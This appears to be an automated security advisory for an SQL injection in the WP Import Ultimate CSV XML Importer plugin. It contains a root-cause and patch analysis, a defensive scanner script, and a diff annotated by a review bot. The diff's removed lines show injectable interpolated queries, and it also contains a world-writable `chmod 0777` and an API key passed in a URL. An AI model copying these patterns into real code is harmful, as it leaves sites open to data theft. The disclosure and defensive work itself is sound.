Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-1317: WP Import – Ultimate CSV XML Importer for WordPress <= 7.37 – Authenticated (Subscriber+) SQL Injection via File Name (wp-ultimate-csv-importer)

CVE ID: CVE-2026-1317
Severity: Medium (CVSS 6.5)
CWE: 89
Vulnerable Version: 7.37
Patched Version: 7.38
Disclosed: February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1317:
This vulnerability is an authenticated SQL injection in the WP Import – Ultimate CSV XML Importer for WordPress plugin, affecting versions up to and including 7.37. The flaw resides in the plugin’s file import functionality, allowing attackers with Subscriber-level access or higher to inject malicious SQL commands via a crafted filename. Successful exploitation requires the ‘Single Import/Export’ option to be enabled and a server running PHP version below 8.0. The CVSS score of 6.5 reflects the combination of authenticated access requirements and the potential for sensitive database information disclosure.

Root Cause:
The vulnerability originates from insufficient escaping and sanitization of the `file_name` parameter stored in the database during file upload operations. The plugin stores uploaded filenames in the `{$wpdb->prefix}smackuci_file_uploads` table without proper validation. Later, when processing imports, the plugin retrieves this filename from the database and directly interpolates it into raw SQL queries without using prepared statements. The vulnerable code is located in `/wp-ultimate-csv-importer/SaveMapping.php` at lines 1341, 1399, and 1410 in the unpatched version. These lines construct SQL queries by concatenating the `$hash_key` variable (which can be influenced via the filename) directly into query strings using double quotes and variable interpolation.

Exploitation:
An attacker must first authenticate with at least Subscriber privileges and have the ‘Single Import/Export’ feature enabled. The attack vector involves uploading a file with a malicious filename containing SQL injection payloads. When the plugin processes the import, it retrieves the filename from the database and uses it in SQL queries without proper sanitization. The attacker can append additional SQL commands to extract sensitive information from the WordPress database. The specific endpoint is `/wp-admin/admin-ajax.php` with the `action` parameter set to the plugin’s AJAX handlers that trigger the import process. The payload would be embedded in the filename parameter during the initial file upload phase.

Patch Analysis:
The patch replaces direct string concatenation in SQL queries with prepared statements using `$wpdb->prepare()`. In `/wp-ultimate-csv-importer/SaveMapping.php`, three vulnerable queries were modified:

- Line 1341 changed from `"SELECT status FROM $log_table_name WHERE hash_key = '$hash_key' "` to `$wpdb->prepare("SELECT status FROM $log_table_name WHERE hash_key = %s ", $hash_key)`.
- Line 1399 changed from ``"SELECT mapping , module FROM $template_table_name WHERE `eventKey` = '$hash_key' "`` to ``$wpdb->prepare("SELECT mapping , module FROM $template_table_name WHERE `eventKey` = %s ", $hash_key)``.
- Line 1410 changed from ``"SELECT id , mode ,file_name , total_rows FROM $file_table_name WHERE `hash_key` = '$hash_key'"`` to ``$wpdb->prepare("SELECT id , mode ,file_name , total_rows FROM $file_table_name WHERE `hash_key` = %s", $hash_key)``.

These changes ensure proper parameter escaping and prevent SQL injection by separating SQL structure from data values.
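A static check for the pattern this patch removes, as an added example (not part of the plugin or of the original analysis): it flags `$wpdb` query calls whose double-quoted SQL literal contains a PHP variable inside single quotes, whether or not the string is wrapped in `$wpdb->prepare()`. The first two samples are the removed and added `SaveMapping.php` lines from the diff on this page, the third is constructed, and the regexes are a heuristic that skips queries assembled in a separate variable.

```python
import re
from typing import List, NamedTuple

# $wpdb methods that send SQL text to the database.
QUERY_CALL = re.compile(r"\$wpdb->(get_results|get_row|get_var|get_col|query)\s*\(\s*")
# Optional $wpdb->prepare( wrapper directly inside the query call.
PREPARE = re.compile(r"\$wpdb->prepare\s*\(\s*")
# A PHP double-quoted string literal (the kind that interpolates variables).
DQ_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"', re.DOTALL)
# A PHP variable used as a quoted SQL value: '$hash_key' or '{$row->id}'.
QUOTED_VAR = re.compile(r"'\s*\{?(\$[A-Za-z_]\w*(?:->\w+)*)\}?\s*'")


class Finding(NamedTuple):
    line: int             # 1-based line of the query call
    method: str           # $wpdb method name
    variables: tuple      # variables interpolated as quoted SQL values
    inside_prepare: bool  # True when the literal was passed to prepare()


def scan_php(source: str) -> List[Finding]:
    """Report $wpdb query calls that interpolate variables into quoted values."""
    findings = []
    for call in QUERY_CALL.finditer(source):
        pos = call.end()
        prep = PREPARE.match(source, pos)
        if prep:
            pos = prep.end()
        literal = DQ_STRING.match(source, pos)
        if not literal:
            # Query text comes from a variable or concatenation; out of scope
            # for this heuristic and worth a manual look.
            continue
        variables = tuple(QUOTED_VAR.findall(literal.group(1)))
        if variables:
            line = source.count("\n", 0, call.start()) + 1
            findings.append(Finding(line, call.group(1), variables, bool(prep)))
    return findings


# Removed ("-") lines from the SaveMapping.php diff on this page.
VULNERABLE = r'''
$total_records = $wpdb->get_results("SELECT status FROM $log_table_name WHERE hash_key = '$hash_key' ", ARRAY_A);
$background_values = $wpdb->get_results("SELECT mapping , module  FROM $template_table_name WHERE `eventKey` = '$hash_key' ");
$get_id = $wpdb->get_results("SELECT id , mode ,file_name , total_rows FROM $file_table_name WHERE `hash_key` = '$hash_key'");
'''.strip()

# Added ("+") lines from the same diff.
PATCHED = r'''
$total_records = $wpdb->get_results($wpdb->prepare("SELECT status FROM $log_table_name WHERE hash_key = %s ", $hash_key), ARRAY_A);
$background_values = $wpdb->get_results($wpdb->prepare("SELECT mapping , module  FROM $template_table_name WHERE `eventKey` = %s ", $hash_key));
$get_id = $wpdb->get_results($wpdb->prepare("SELECT id , mode ,file_name , total_rows FROM $file_table_name WHERE `hash_key` = %s", $hash_key));
'''.strip()

# Constructed sample: prepare() is called, but one value is still interpolated,
# so the call remains injectable through $hash_key.
MISUSED_PREPARE = r'''
$row = $wpdb->get_row($wpdb->prepare("SELECT id FROM $table WHERE hash_key = '$hash_key' AND id = %d", $id));
'''.strip()


if __name__ == "__main__":
    for name, sample in (("vulnerable", VULNERABLE),
                         ("patched", PATCHED),
                         ("misused prepare", MISUSED_PREPARE)):
        print(name)
        for f in scan_php(sample):
            wrapper = "inside prepare()" if f.inside_prepare else "no prepare()"
            print(f"  line {f.line}: $wpdb->{f.method} interpolates "
                  f"{', '.join(f.variables)} ({wrapper})")
```

Unquoted identifiers such as `$log_table_name` are deliberately not flagged, since `$wpdb->prepare()` cannot bind table names; those need a separate review of where the name is assigned.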

Impact:
Successful exploitation allows authenticated attackers to execute arbitrary SQL queries on the WordPress database. This can lead to complete database compromise, including extraction of sensitive information such as user credentials (hashed passwords), personal data, plugin settings, and other confidential content stored in the database. While the vulnerability requires Subscriber-level access, this is a low barrier as many WordPress sites allow user registration. The information disclosure can facilitate further attacks, including privilege escalation and complete site takeover if administrative credentials are compromised.

Differential between vulnerable and patched code

Code Diff
--- a/wp-ultimate-csv-importer/SaveMapping.php
+++ b/wp-ultimate-csv-importer/SaveMapping.php
@@ -1341,7 +1341,7 @@
 		if ($rollback_option == 'true') {
 			$response['rollback'] = true;
 		}
-		$total_records = $wpdb->get_results("SELECT status FROM $log_table_name WHERE hash_key = '$hash_key' ", ARRAY_A);
+		$total_records = $wpdb->get_results($wpdb->prepare("SELECT status FROM $log_table_name WHERE hash_key = %s ", $hash_key), ARRAY_A);
 		if ($total_records[0]['status'] == 'Completed') {
 			if (get_option('failed_line_number')) {
 				delete_option('failed_line_number');
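Review bot: `$total_records[0]['status']` on the line after the rewritten query is read without checking that the query returned a row; with the parameterized lookup an unknown `hash_key` yields an empty array, so this raises an undefined-index notice or warning and the comparison silently fails. Guard it with `if (!empty($total_records) && $total_records[0]['status'] == 'Completed')`. Separately, `$log_table_name` is still interpolated into the string handed to `$wpdb->prepare()`; that is acceptable only if it is built from `$wpdb->prefix` and a constant, which is worth confirming where it is assigned.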
@@ -1399,13 +1399,13 @@

 		$response = [];

-		$background_values = $wpdb->get_results("SELECT mapping , module  FROM $template_table_name WHERE `eventKey` = '$hash_key' ");
+		$background_values = $wpdb->get_results($wpdb->prepare("SELECT mapping , module  FROM $template_table_name WHERE `eventKey` = %s ", $hash_key));
 		foreach ($background_values as $values) {
 			$mapped_fields_values = $values->mapping;
 			$selected_type = $values->module;
 		}

-		$get_id = $wpdb->get_results("SELECT id , mode ,file_name , total_rows FROM $file_table_name WHERE `hash_key` = '$hash_key'");
+		$get_id = $wpdb->get_results($wpdb->prepare("SELECT id , mode ,file_name , total_rows FROM $file_table_name WHERE `hash_key` = %s", $hash_key));
 		$get_mode = $get_id[0]->mode;
 		$total_rows = $get_id[0]->total_rows;
 		$file_name = $get_id[0]->file_name;
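Review bot: the three reads of `$get_id[0]` after the last rewritten query assume a matching row exists; when `hash_key` matches nothing, `$get_id` is empty and `$get_id[0]->mode` dereferences null. Return an error response when `empty($get_id)`. The same applies to `$mapped_fields_values` and `$selected_type`, which stay undefined if the `foreach` over `$background_values` never runs.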
@@ -1690,7 +1690,7 @@

 		$log_manager_instance->manage_records($hash_key, $selected_type, $file_name, $total_rows);

-		$count = count($info);
+		$count = (is_array($info) || $info instanceof Countable) ? count($info) : 0;

 		for ($i = 1; $i <= $count; $i++) {

--- a/wp-ultimate-csv-importer/controllers/SendPassword.php
+++ b/wp-ultimate-csv-importer/controllers/SendPassword.php
@@ -85,10 +85,7 @@
 		// Fetch settings safely
 		$result['setting'] = get_option( 'openAI_settings' );

-		// Return as proper JSON response
-		wp_send_json_success( $result );
-
-		// End execution safely
+		echo wp_json_encode($result);
 		wp_die();

 	}
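Review bot: replacing `wp_send_json_success( $result )` with `echo wp_json_encode($result)` changes the response contract: the `success`/`data` envelope is gone and no `Content-Type: application/json` header is sent, so client code that reads the `data` member breaks. Keep `wp_send_json_success()` or use `wp_send_json( $result )`. Also, `$result['setting']` returns the stored `openAI_settings` value to the caller, and after the `showOptions()` change in this file that value contains the API key; return a masked key or a has-key flag instead.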
@@ -101,23 +98,29 @@
 	public function showOptions() {
 		check_ajax_referer('smack-ultimate-csv-importer', 'securekey');

-		$json = isset($_POST['data']) ? wp_unslash($_POST['data']) : '';
+		$prefixValue = isset($_POST['prefixValue']) ? sanitize_text_field($_POST['prefixValue']) : '';

-  		// Decode JSON
-    	$data = json_decode($json, true);
+		if ($prefixValue === 'delete') {
+			delete_option('openAI_settings');
+			$result['success'] = true;
+			echo wp_json_encode($result);
+			wp_die();
+		}

-    	// Sanitize the value
-    	$apikey = isset($data['apikey']) ? sanitize_text_field($data['apikey']) : '';
-		update_option('openAI_settings', $apikey);
+		$json = isset($_POST['data']) ? wp_unslash($_POST['data']) : '';
+		$data = json_decode($json, true);

-		if(!empty($apikey )){
-			update_option('openAI_settings', $apikey);
-		}
-		if(!empty($apikey )){
-			if($apikey == 'delete'){
-				delete_option('openAI_settings');
-			}
+		if (is_array($data)) {
+			$settings = [
+				'ai' => isset($data['ai']) ? sanitize_text_field($data['ai']) : 'chatgpt',
+				'apikey' => isset($data['apikey']) ? sanitize_text_field($data['apikey']) : '',
+				'model' => isset($data['model']) ? sanitize_text_field($data['model']) : '',
+				'enabled' => isset($data['enabled']) ? (bool)$data['enabled'] : false,
+			];
+
+			update_option('openAI_settings', json_encode($settings));
 		}
+
 		$ucisettings = get_option('sm_uci_pro_settings');
 		foreach ($ucisettings as $key => $val) {
 			$settings[$key] = json_decode($val);
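Review bot: `$settings` is assigned the new AI settings array inside the `if (is_array($data))` block and is then reused by the `foreach ($ucisettings ...)` loop that follows, so the `ai`, `apikey`, `model` and `enabled` entries are carried into whatever that loop builds. Use a distinct name such as `$ai_settings` for the array passed to `update_option()`. The only gate visible in this hunk is `check_ajax_referer()`, which is a CSRF check and not an authorization check; the `delete` branch and the key update should also sit behind `current_user_can('manage_options')` unless that is enforced elsewhere. Prefer `wp_json_encode()` over `json_encode()` for consistency with the rest of the handler.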
--- a/wp-ultimate-csv-importer/importExtensions/CoreFieldsImport.php
+++ b/wp-ultimate-csv-importer/importExtensions/CoreFieldsImport.php
@@ -1067,8 +1067,9 @@
 			if (strpos($innerKey, '->openAI') !== false) {
 				$OpenAIHelper = new OpenAIHelper;
 				$newKey = str_replace('->openAI', '', $innerKey);
-				$data_array[$newKey] = $OpenAIHelper->generateContent($innerValue);
-
+				$numKey = $newKey . '->num';
+				$maxWords = isset($data_array[$numKey]) ? intval($data_array[$numKey]) : 0;
+				$data_array[$newKey] = $OpenAIHelper->generateContent($innerValue, $maxWords);
 			}

 			if (stripos($innerKey, 'openAI') !== false) {
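Review bot: the return value of `generateContent($innerValue, $maxWords)` is written straight into `$data_array[$newKey]`, but the method returns `false` when no API key is set and, per the `processResponse()` change in `OpenAIHelper.php`, an "Error (...)" string on failure, either of which would be imported as field content. Check the result before assigning and skip or log the field on failure. `$maxWords` also has no upper bound after `intval()`; clamp it to a sane maximum.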
--- a/wp-ultimate-csv-importer/importExtensions/OpenAIHelper.php
+++ b/wp-ultimate-csv-importer/importExtensions/OpenAIHelper.php
@@ -15,14 +15,49 @@
     private $apiKey;
     private $baseUrl = 'https://api.openai.com/v1/chat/completions';
     private $image_baseUrl = 'https://api.openai.com/v1/images/generations';
-    public function generateContent($prompt) {
-        $get_key =get_option('openAI_settings');
-        $this->apiKey = $get_key;
+    public function generateContent($prompt, $maxWords = 0) {
+        $settings = get_option('openAI_settings');
+
+        // Handle legacy string settings or new JSON settings
+        if (is_string($settings) && $json = json_decode($settings, true)) {
+            if (isset($json['ai'])) {
+                $settings = $json;
+            } else {
+                // It might be a JSON but not our settings structure, or just a key
+                // If it's just a key, treat as legacy OpenAI
+                $settings = ['ai' => 'chatgpt', 'apikey' => $settings, 'model' => 'gpt-3.5-turbo'];
+            }
+        } elseif (is_string($settings)) {
+             $settings = ['ai' => 'chatgpt', 'apikey' => $settings, 'model' => 'gpt-3.5-turbo'];
+        }
+
+        $provider = isset($settings['ai']) ? $settings['ai'] : 'chatgpt';
+        $this->apiKey = isset($settings['apikey']) ? $settings['apikey'] : '';
+        $model = isset($settings['model']) ? $settings['model'] : '';
+
+        if (empty($this->apiKey)) {
+            return false;
+        }
+
+        switch ($provider) {
+            case 'gemini':
+                return $this->generateGeminiContent($prompt, $model, $maxWords);
+            case 'claude':
+                return $this->generateClaudeContent($prompt, $model, $maxWords);
+            case 'chatgpt':
+            default:
+                return $this->generateOpenAIContent($prompt, $model, $maxWords);
+        }
+    }

+    private function generateOpenAIContent($prompt, $model, $maxWords = 0) {
+        $model = $model ?: 'gpt-3.5-turbo';
+        if ($maxWords > 0) {
+            $prompt .= " The response must be approximately $maxWords words long. Do not include the word count or any meta-information about the length in the output.";
+        }
         $data = [
             'messages' => [['role' => 'user', 'content' => $prompt]],
-            'model' => 'gpt-3.5-turbo',
-            'max_tokens' => $maxCharacters,
+            'model' => $model,
         ];

         $headers = [
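Review bot: dropping `max_tokens` from the request body in `generateOpenAIContent()` leaves output length controlled only by the sentence appended to `$prompt`, which the model may ignore, so response size and cost per imported row are unbounded. Keep a hard `max_tokens` derived from `$maxWords` (with a default when it is 0), as `generateClaudeContent()` does with its fixed 1024. In the legacy branch of `generateContent()`, a stored value that decodes as JSON but lacks an `ai` key is passed on whole as the API key; returning `false` there would be safer.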
@@ -33,19 +68,98 @@
         $response = wp_remote_post($this->baseUrl, array(
             'body' => json_encode($data),
             'headers' => $headers,
+            'timeout' => 60,
+        ));
+
+        return $this->processResponse($response, 'openai');
+    }
+
+    private function generateGeminiContent($prompt, $model, $maxWords = 0) {
+        $model = $model ?: 'gemini-flash-latest';
+        if ($maxWords > 0) {
+            $prompt .= " The response must be approximately $maxWords words long. Do not include the word count or any meta-information about the length in the output.";
+        }
+        $url = "https://generativelanguage.googleapis.com/v1beta/models/{$model}:generateContent?key=" . $this->apiKey;
+
+        $data = [
+            'contents' => [
+                [
+                    'parts' => [
+                        ['text' => $prompt]
+                    ]
+                ]
+            ]
+        ];
+
+        $headers = [
+            'Content-Type' => 'application/json',
+        ];
+
+        $response = wp_remote_post($url, array(
+            'body' => json_encode($data),
+            'headers' => $headers,
+            'timeout' => 60,
+        ));
+
+        return $this->processResponse($response, 'gemini');
+    }
+
+    private function generateClaudeContent($prompt, $model, $maxWords = 0) {
+        $model = $model ?: 'claude-3-opus-20240229';
+        if ($maxWords > 0) {
+            $prompt .= " The response must be approximately $maxWords words long. Do not include the word count or any meta-information about the length in the output.";
+        }
+        $url = 'https://api.anthropic.com/v1/messages';
+
+        $data = [
+            'model' => $model,
+            'max_tokens' => 1024,
+            'messages' => [
+                ['role' => 'user', 'content' => $prompt]
+            ]
+        ];
+
+        $headers = [
+            'x-api-key' => $this->apiKey,
+            'anthropic-version' => '2023-06-01',
+            'content-type' => 'application/json',
+        ];
+
+        $response = wp_remote_post($url, array(
+            'body' => json_encode($data),
+            'headers' => $headers,
+            'timeout' => 60,
         ));

+        return $this->processResponse($response, 'claude');
+    }
+
+    private function processResponse($response, $provider) {
+        if (is_wp_error($response)) {
+            return "Error: " . $response->get_error_message();
+        }
+
         $httpCode = wp_remote_retrieve_response_code($response);
-        $decodedResponse = json_decode(wp_remote_retrieve_body($response), true);
-        if (isset($httpCode) && $httpCode != 200) {
-            return $httpCode;
-        }
-        if (isset($decodedResponse['choices'][0]['message']['content'])) {
-            return $decodedResponse['choices'][0]['message']['content'];
-        } else {
-            return false;
+        $body = wp_remote_retrieve_body($response);
+        $decodedResponse = json_decode($body, true);
+
+        if ($httpCode != 200) {
+            // Log error or return code
+            return "Error ($httpCode): " . $body;
+        }
+
+        switch ($provider) {
+            case 'openai':
+                return isset($decodedResponse['choices'][0]['message']['content']) ? $decodedResponse['choices'][0]['message']['content'] : false;
+            case 'gemini':
+                return isset($decodedResponse['candidates'][0]['content']['parts'][0]['text']) ? $decodedResponse['candidates'][0]['content']['parts'][0]['text'] : false;
+            case 'claude':
+                return isset($decodedResponse['content'][0]['text']) ? $decodedResponse['content'][0]['text'] : false;
+            default:
+                return false;
         }
     }
+
     public function generateImage($prompt) {
         $get_key =get_option('openAI_settings');
         $this->apiKey = $get_key;
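Review bot: in `generateGeminiContent()` the API key is appended to the request URL as `?key=`, where it can end up in proxy, debug and HTTP client logs, and `$model` is placed in the URL path without encoding. Send the key in a request header (the Gemini API accepts `x-goog-api-key`) and pass `$model` through `rawurlencode()` or check it against an allow-list. `processResponse()` returns the raw upstream body inside the "Error ($httpCode): " string, which callers cannot tell apart from generated content; return `false` or a `WP_Error` and log the body instead. `generateImage()` below still assigns `get_option('openAI_settings')` directly to `$this->apiKey`, but `showOptions()` now stores that option as a JSON object, so image generation will send the JSON string as the key.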
--- a/wp-ultimate-csv-importer/languages/LangEN.php
+++ b/wp-ultimate-csv-importer/languages/LangEN.php
@@ -32,7 +32,7 @@
                 'Backupineditableformatdesc' => 'Backup in 4 different file formats like CSV, XML, JSON,XLS.',
                 'AutoScheduledBackups' => 'Auto Scheduled Backups',
                 'AutoScheduledBackupsdesc' => 'Scheduled export helps backup as editable text file format in regular interval.',
-                'AutoSchedulewithreusabletemplates' => 'Want to know how the import works, how to verify each import, and what to do afterward? Check out the comprehensive documentation for WP Ultimate CSV Importer to learn more.',
+                'AutoSchedulewithreusabletemplates' => 'Create advanced import rules & conditional logic',
                 'Dashboard' => 'Dashboard',
                 'Manager' => 'Manager',
                 'csv_importlink' => 'click here',
@@ -184,11 +184,11 @@
                 'Thisfeatureisavailable' => 'This feature is available in',
                 'UltimateCSVImporterPro'=> 'Ultimate CSV Importer Pro',
                 'Exporterwithadvancedfilters' => 'Exporter with advanced filters',
-                'Updateolderpostsfromsingleimport' => 'Help & Resources',
-                'JetEngineMetaboxToolsetTypesACFproFreeandPodsFieldPostPluginsImporter'=> 'Join Our Community!',
-                'SEOPluginsDataImporterRankMathYoastandAllinOneSEO' => 'SEO Plugins Data Importer - RankMath, SEOPress, Yoast and All in One SEO',
+                'Updateolderpostsfromsingleimport' => 'Import large files without timeout errors',
+                'JetEngineMetaboxToolsetTypesACFproFreeandPodsFieldPostPluginsImporter'=> 'Import WooCommerce variable products, orders, etc.',
+                'SEOPluginsDataImporterRankMathYoastandAllinOneSEO' => 'Schedule recurring imports via cron jobs',
                 'WarningImportforsomedataaredisabledInstallandactivatebelowpluginsfirst'=> 'Warning: Some addons are missing, it is recommended to',
-                'AIOWooCommerceImportSuit' => 'Connect with fellow users, ask questions, and share your experiences in our CSV Importers Facebook Community. Join us today and become part of a vibrant, supportive network of WP Ultimate CSV Importer users!',
+                'AIOWooCommerceImportSuit' => 'Import JetEngine, ACF, MetaBox, and other custom fields',
                 'PostContentImageOption' => 'Post Content Image Option',
                 'installactivate' => 'to install and activate now',
                 'EnabletodeletetheitemsnotpresentinCSVXMLfile' => 'Enable to remove the elements that are not present in the CSV/XML file',
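Review bot: the translation keys in this hunk no longer describe their values, for example `'SEOPluginsDataImporterRankMathYoastandAllinOneSEO' => 'Schedule recurring imports via cron jobs'`, and any other screen that still uses these keys for their original meaning will now show the wrong text. Add new keys for the new strings and leave the existing ones intact. These string changes are also unrelated to the SQL injection fix and would be easier to review in a separate commit.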
@@ -210,7 +210,7 @@
                 'Createasupport' => 'Create a support topic here for help',
                 'Exportfiltereddata' => 'Export filtered data',
                 'CreateTopic' => 'Create Topic',
-                'WPMLImporter' => 'WPML Importer',
+                'WPMLImporter' => 'Update existing records without duplicates',
                 'DownloadPostContentExternalImagestoMedia' => 'Download Post Content External Images to Media',
                 'Addcustomsizes' => 'Add custom sizes',
                 'backupineditableformat' => 'backup copy in editable format',
--- a/wp-ultimate-csv-importer/managerExtensions/LogManager.php
+++ b/wp-ultimate-csv-importer/managerExtensions/LogManager.php
@@ -8,13 +8,13 @@
 namespace SmackcodersFCSV;

 if ( ! defined( 'ABSPATH' ) )
-    exit; // Exit if accessed directly
+	exit; // Exit if accessed directly

 class LogManager {

     private static $instance = null,$saveMappingInstance;
-    private static $smack_csv_instance = null;
-    // declare log file and file pointer as private properties
+	private static $smack_csv_instance = null;
+	// declare log file and file pointer as private properties
 	private $log_file, $fp;
 	public $logArr;
 	public function __construct(){
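Review bot: every changed line in this hunk, and in most of the `LogManager.php` hunks that follow, differs only in leading whitespace (spaces to tabs), which buries the security-relevant changes of this release in formatting noise. Move the re-indentation to its own commit so the fix can be audited and backported cleanly.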
@@ -23,23 +23,23 @@
 		add_action('wp_ajax_download_media_log',array($this,'download_media_log'));
 		add_action('wp_ajax_download_failed_log',array($this,'download_failed_log'));
 		add_action('wp_ajax_delete_log',array($this,'delete_log'));
-    }
+	}

     public static function getInstance() {
 		if (LogManager::$instance == null) {
 			LogManager::$instance = new LogManager;
-            LogManager::$smack_csv_instance = SmackCSV::getInstance();
+			LogManager::$smack_csv_instance = SmackCSV::getInstance();
 			LogManager::$saveMappingInstance = SaveMapping::getInstance();
 			return LogManager::$instance;
 		}
 		return LogManager::$instance;
-    }
+	}


 	/**
 	 * Writes event log in log file.
 	 * @param  string $hash_key - file hash key
-     * @param  string $original_file_name - file name
+	 * @param  string $original_file_name - file name
 	 * @param  string $fileType - file extension
 	 * @param  string $mode - file mode (import or update)
 	 * @param  int    $totalCount - Total number of records
@@ -52,7 +52,7 @@
 		global $logArr;
 		if (is_array($core_log)){
 			$logArr = $core_log;
-			$this->displayLogValue($logArr);
+			$this->displayLogValue($logArr);
 		}
 	}
 	public function displayLogValue(){
@@ -70,7 +70,7 @@
 		$response = [];
 		$logInfo = [];
 		$value = [];
-
+
 		$logInformation = $wpdb->get_results("select * from {$wpdb->prefix}smackuci_events where deletelog = 0 order by id desc ");
 		if(empty($logInformation)){
 			$response['success'] = false;
@@ -85,7 +85,7 @@
 				$updated = $logValue->updated;
 				$skipped = $logValue->skipped;
 				$failed = $logValue->failed;
-
+
 				$logInfo['filename'] = $file_name;
 				$logInfo['revision'] = $revision;
 				$logInfo['module'] = $module;
@@ -93,13 +93,13 @@
 				$logInfo['updated'] = $updated;
 				$logInfo['skipped'] = $skipped;
 				$logInfo['failed'] = $failed;
-
+
 				array_push($value , $logInfo);
 			}
 			$response['success'] = true;
 			$response['info'] = $value;
 			$response['importer_records']=$logArr;
-		}
+		}
 		echo wp_json_encode($response);
 		wp_die();
 	}
@@ -123,21 +123,21 @@
 	}
 	public function delete_log(){
 		check_ajax_referer('smack-ultimate-csv-importer', 'securekey');
-		global $wpdb;
+		global $wpdb;
 		$smack_instance = SmackCSV::getInstance();
 		$filename = sanitize_text_field($_POST['filename']);
-		$revision = sanitize_text_field($_POST['revision']);
+		$revision = sanitize_text_field($_POST['revision']);
 		$upload_path = $smack_instance->create_upload_dir();
-		$get_details = $wpdb->get_results($wpdb->prepare("select id,eventKey from {$wpdb->prefix}smackuci_events where revision = %d and original_file_name = %s", $revision, $filename));
+		$get_details = $wpdb->get_results($wpdb->prepare("select id,eventKey from {$wpdb->prefix}smackuci_events where revision = %d and original_file_name = %s", $revision, $filename));
 		if (!empty($get_details)) {
 			foreach ($get_details as $records) {
-				$eventKey = $records->eventKey;
+				$eventKey = $records->eventKey;
 				$directories = [
 					$upload_path . 'import_logs/' . $eventKey . '/',
 					$upload_path . 'failed_media_logs/' . $eventKey . '/',
 					$upload_path . 'media_logs/' . $eventKey . '/',
 				];
-
+
 				foreach ($directories as $directoryPath) {
 					if (!$this->delete_directory($directoryPath)) {
 						$response['message'] = "File not available. Kindly refresh the page.";
@@ -145,9 +145,9 @@
 						wp_die();
 					}
 				}
-
+
 				$wpdb->update($wpdb->prefix . 'smackuci_events', ['deletelog' => true], ['id' => $records->id]);
-			}
+			}
 			$response['message'] = "Deleted Successfully";
 			echo wp_json_encode($response);
 			wp_die();
@@ -155,10 +155,10 @@
 		else {
 			$response['message'] = "Record not found";
 		}
-
+
 		echo wp_json_encode($response);
 		wp_die();
-	}
+	}

 	/**
 	 * Downloads download_media_log .
@@ -167,18 +167,18 @@
 	// 	check_ajax_referer('smack-ultimate-csv-importer', 'securekey');
 	// 	global $wpdb;
 	// 	$response = [];
-    //     $filename = sanitize_file_name($_POST['filename']);
-    //     $revision = sanitize_text_field($_POST['revision']);
+	//     $filename = sanitize_file_name($_POST['filename']);
+	//     $revision = sanitize_text_field($_POST['revision']);
+
+	//     $upload = wp_upload_dir();
+	//     $upload_dir = $upload['baseurl'];
+	//     $upload_url = $upload_dir . '/smack_uci_uploads/imports/media_logs/';

-    //     $upload = wp_upload_dir();
-    //     $upload_dir = $upload['baseurl'];
-    //     $upload_url = $upload_dir . '/smack_uci_uploads/imports/media_logs/';
-
-    //     $upload_path = LogManager::$smack_csv_instance->create_upload_dir();
+	//     $upload_path = LogManager::$smack_csv_instance->create_upload_dir();
 	// 	$get_event_key = $wpdb->get_results($wpdb->prepare("SELECT eventKey FROM {$wpdb->prefix}smackuci_events WHERE revision = %d AND original_file_name = %s", $revision , $filename));
 	// 	if(empty($get_event_key)) {
 	// 		$response['success'] = false;
-    //         $response['message'] = 'Log not exists';
+	//         $response['message'] = 'Log not exists';
 	// 	}
 	// 	else {
 	// 		$logPath = $upload_path.'media_logs'.'/'.$get_event_key[0]->eventKey .'/';
@@ -186,115 +186,115 @@
 	// 			$loglink = $upload_url .$get_event_key[0]->eventKey .'/'.'media_log.csv';
 	// 			$response['success'] = true;
 	// 			$response['media_log_link'] = $loglink;
-
+
 	// 		else :
 	// 			$response['success'] = false;
 	// 			$response['message'] = 'Log not exists';
-
+
 	// 		endif;
 	// 	}
-    //     echo wp_json_encode($response);
-    //     wp_die();
+	//     echo wp_json_encode($response);
+	//     wp_die();
 	// }
 	public function download_media_log(){
 		check_ajax_referer('smack-ultimate-csv-importer', 'securekey');
-
-	global $wpdb;
-
-	$response = [];
-	$filename = sanitize_file_name($_POST['filename']);
-	$revision = isset($_POST['revision']) ? sanitize_text_field($_POST['revision']) : '';
+
+		global $wpdb;
+
+		$response = [];
+		$filename = sanitize_file_name($_POST['filename']);
+		$revision = isset($_POST['revision']) ? sanitize_text_field($_POST['revision']) : '';
 	$hash_key=isset($_POST['hashkey'] ) ? sanitize_text_field($_POST['hashkey']) : '';
 		if(empty($hash_key)){
 			$event_key_result = $wpdb->get_results($wpdb->prepare("SELECT eventKey FROM {$wpdb->prefix}smackuci_events WHERE revision = %d AND original_file_name = %s", $revision, $filename));
-		$get_event_key = $event_key_result[0]->eventKey;
-
+			$get_event_key = $event_key_result[0]->eventKey;
+
 		}
 		else{
 			$get_event_key=$hash_key;
 		}
-
-	if (empty($get_event_key)) {
-		$response['success'] = false;
-		$response['message'] = 'Log not exists';
-		echo wp_json_encode($response);
-		wp_die();
-	} else {

-		$upload_dir = WP_CONTENT_DIR . '/uploads/smack_uci_uploads/media_log/' . $get_event_key . '/';
-
-		if (!is_dir($upload_dir)) {
-			if (!wp_mkdir_p($upload_dir)) {
-				return null;
+		if (empty($get_event_key)) {
+			$response['success'] = false;
+			$response['message'] = 'Log not exists';
+			echo wp_json_encode($response);
+			wp_die();
+		} else {
+
+			$upload_dir = WP_CONTENT_DIR . '/uploads/smack_uci_uploads/media_log/' . $get_event_key . '/';
+
+			if (!is_dir($upload_dir)) {
+				if (!wp_mkdir_p($upload_dir)) {
+					return null;
+				}
 			}
-		}
-		chmod($upload_dir, 0777);
-
-		$index_file = $upload_dir . 'index.php';
-		if (!file_exists($index_file)) {
-			$index_content = '<?php' . PHP_EOL . '?>';
-			file_put_contents($index_file, $index_content);
-			chmod($index_file, 0644);
-		}
+			chmod($upload_dir, 0777);

-		$baseFileName = 'Media_log';
-		$export_type = 'csv';
-		$file_path = $upload_dir . $baseFileName . '.' . $export_type;
-		$file_url = network_home_url() . '/wp-content/uploads/smack_uci_uploads/media_log/' . $get_event_key . '/' . $baseFileName . '.' . $export_type;
+			$index_file = $upload_dir . 'index.php';
+			if (!file_exists($index_file)) {
+				$index_content = '<?php' . PHP_EOL . '?>';
+				file_put_contents($index_file, $index_content);
+				chmod($index_file, 0644);
+			}

-
+			$baseFileName = 'Media_log';
+			$export_type = 'csv';
+			$file_path = $upload_dir . $baseFileName . '.' . $export_type;
+			$file_url = network_home_url() . '/wp-content/uploads/smack_uci_uploads/media_log/' . $get_event_key . '/' . $baseFileName . '.' . $export_type;

-		if (file_exists($file_path)) {
-			// If the file already exists, return the file URL
-			$response['success'] = true;
-			$response['file_url'] = $file_url;
